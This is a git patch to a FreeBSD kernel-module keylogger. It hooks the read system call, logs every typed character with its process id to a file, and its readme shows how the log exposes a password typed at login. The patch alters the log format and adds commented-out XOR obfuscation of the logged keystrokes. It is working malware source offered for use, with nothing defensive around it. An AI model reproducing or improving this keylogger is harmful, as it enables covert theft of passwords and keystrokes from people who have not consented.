From 38faa4d75e08de3b41b7737bbb209f7b9a97748a Mon Sep 17 00:00:00 2001 From: your-favorite-hacker Date: Thu, 4 Jun 2015 16:16:50 +0200 Subject: [PATCH] remove print and decimal --- keylog/keylog.c | 16 +++++++++++----- keylog/readme.txt | 2 +- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/keylog/keylog.c b/keylog/keylog.c index 8a01056..d1ee2dd 100644 --- a/keylog/keylog.c +++ b/keylog/keylog.c @@ -48,7 +48,6 @@ static int keylog_write(struct thread *td, int fd, char *line, u_int len) auio.uio_td = td; - printf(aiov.iov_base); err = kern_writev(td, fd, &auio); return err; @@ -88,10 +87,12 @@ static int read_hook(struct thread *td, void *syscall_args) uap = (struct read_args *)syscall_args; int error; - char buf[1]; int done; - char string[64]; + int fd = -1; + unsigned char buf[1]; + unsigned char string[64]; +// unsigned char XORPASS[] = "abcdefghij"; copyinstr(uap->buf,buf,1,&done); error = sys_read(td, syscall_args); @@ -104,11 +105,16 @@ static int read_hook(struct thread *td, void *syscall_args) // open up file keylog_open(curthread, &fd, LOGPATH); - // prepare string, processid, character and character decimal value - sprintf(string, "[%d]:%c(%d)\n", td->td_proc->p_pid, buf[0],buf[0]); + // prepare string, processid and character decimal value, no newline + sprintf(string, "%d:%c", td->td_proc->p_pid,buf[0]); +/* for (int j=0;j<10;j++){ + string[j]=string[j]^XORPASS[j]; + }*/ // write data to filedescriptor keylog_write(curthread, fd, string, strlen(string)); + // write a newline + keylog_write(curthread, fd, "\n", 1); // close file keylog_close(curthread, fd); diff --git a/keylog/readme.txt b/keylog/readme.txt index 0098ead..0661641 100644 --- a/keylog/readme.txt +++ b/keylog/readme.txt @@ -36,7 +36,7 @@ Id Refs Address Size Name [1915]: (10) -The logfile is organized as follows: [pid]:character(character as decimal value). In this case you can see +The logfile is organized as follows: [pid]:character. In this case you can see that the entered password, called due the login binary with process id 1915 is: 'password'. If you want to change the path, go into the sourcecode and look for the variable LOGPATH.